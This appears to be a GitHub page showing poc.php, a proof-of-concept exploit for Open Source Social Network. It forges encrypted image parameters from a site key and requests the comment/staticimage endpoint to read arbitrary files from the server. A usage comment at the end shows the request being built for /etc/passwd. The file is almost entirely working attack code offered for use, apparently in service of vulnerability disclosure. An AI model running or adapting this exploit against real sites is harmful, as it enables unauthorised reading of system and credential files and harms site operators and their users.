-
Notifications
You must be signed in to change notification settings - Fork 3
Expand file tree
/
Copy pathpoc.php
More file actions
122 lines (104 loc) · 3.96 KB
/
Copy pathpoc.php
File metadata and controls
122 lines (104 loc) · 3.96 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
<?php
/**
* Ossn padding of key if its less then 16 bytes
*
* @param string $key key for decode
*
* @return string|boolean
*/
function ossn_string_encrypt_key_cycled($key = "") {
if (empty($key)) {
return false;
}
$required_length = 20;
//https://bugs.php.net/bug.php?id=72362
//repeate key until 56 bytes 123 beomes 123123123... until 56 bytes
// i can use OPENSSL_DONT_ZERO_PAD_KEY but its cycling key less then 16 bytes to something else
//key cycling and truncating start,
//purpose is to make openssl_encrypt generate same encrypted message generated by mcrypt so if you pass message to
//older version of ossn that using php < 7.2 should able to decode the messsage.
$keylen = mb_strlen($key, '8bit');
//ossn_string_encrypt_key_cycled should not generate more than 56 bytes #1508
if($keylen < 20){ //lets say we need to generate 20 bytes
$ceil = ceil($required_length / $keylen);
$key = str_repeat($key, $ceil);
}
echo "Cycled Key ", substr($key, 0, $required_length), PHP_EOL;
return substr($key, 0, $required_length);
//key cycling and truncating end
}
/**
* Ossn encrypt string
*
* @param string $string a string you want to decrypt
* @param string $key key for decode
*
* @return string|boolean
*/
function ossn_string_encrypt($string = '', $key = '') {
if (empty($string)) {
return false;
}
$key = ossn_string_encrypt_key_cycled($key);
//string also need to be at least 16 bytes
$string = utf8_encode($string);
if (strlen($string) % 8) {
$string = str_pad($string, strlen($string) + 8 - strlen($string) % 8, "\0");
}
$size = openssl_cipher_iv_length('bf-ecb');
$mcgetvi = openssl_random_pseudo_bytes($size);
return trim(openssl_encrypt($string, "bf-ecb", $key, OPENSSL_RAW_DATA | OPENSSL_NO_PADDING, $mcgetvi));
}
/**
* Ossn decrypt string
*
* @param string $string a string you want to decrypt
* @param string $key key for decode
*
* @return string|boolean
*/
function ossn_string_decrypt($string = '', $key = '') {
$key = ossn_string_encrypt_key_cycled($key);
$size = openssl_cipher_iv_length('bf-ecb');
$mcgetvi = openssl_random_pseudo_bytes($size);
//note mcrypt and now this acting mcrpyt adds the spaces to make 16 bytes if its less then 16 bytes
//you can use trim() to get orignal data without spaces
$decrypted = openssl_decrypt($string, "bf-ecb", $key, OPENSSL_RAW_DATA | OPENSSL_NO_PADDING, $mcgetvi);
return $decrypted;
}
$func = $argv[1];
$site_key = $argv[2];
$url_string = $argv[3];
if ($func == "read") {
$site_key = $argv[2];
$target_site = $argv[3];
$target_file = $argv[4];
$encrypted_file = base64_encode(base64_encode(ossn_string_encrypt($target_file, $site_key)));
$encrypted_url = $target_site."/comment/staticimage?image=".$encrypted_file;
$file_contents = file_get_contents($encrypted_url);
echo $encrypted_url, PHP_EOL;;
echo $file_contents;
}
if ($func == "decrypt") {
$encrypted = base64_decode(base64_decode($url_string));
echo "Decrypted String: ", PHP_EOL;
echo ossn_string_decrypt($encrypted, $site_key), PHP_EOL;
}
if ($func == "encrypt") {
$encrypted = $url_string;
echo "Encrypting String: ", $encrypted, PHP_EOL;
echo base64_encode(base64_encode(ossn_string_encrypt($encrypted, $site_key))), PHP_EOL;
}
/**
* apt install php7.2-cli php7.2-mbstring
* root@e80c29b10e33:/var/www/html# php -f poc.php decrypt "e894e328" "c1NBMFZaQnUrZGFpWkRpYzlHQy9EN3Y2WndIUFAxV0N4cHRTWWxJbW9QengvUHJsZG1Gb001bHo3d0daOTkrM2VpcEtpb2d0MWpvPQ=="
* Decrypted String:
* /var/www/ossn_data/tmp/photos/1583856786-a27e46.jpg
* root@e80c29b10e33:/var/www/html# php -f poc.php encrypt "e894e328" "/etc/passwd"
* Encrypting String:
* cXg1V2tmZDd2OEVYOVUwMzNaMTkrZz09
*
*
* a7a28a4b
*/
?>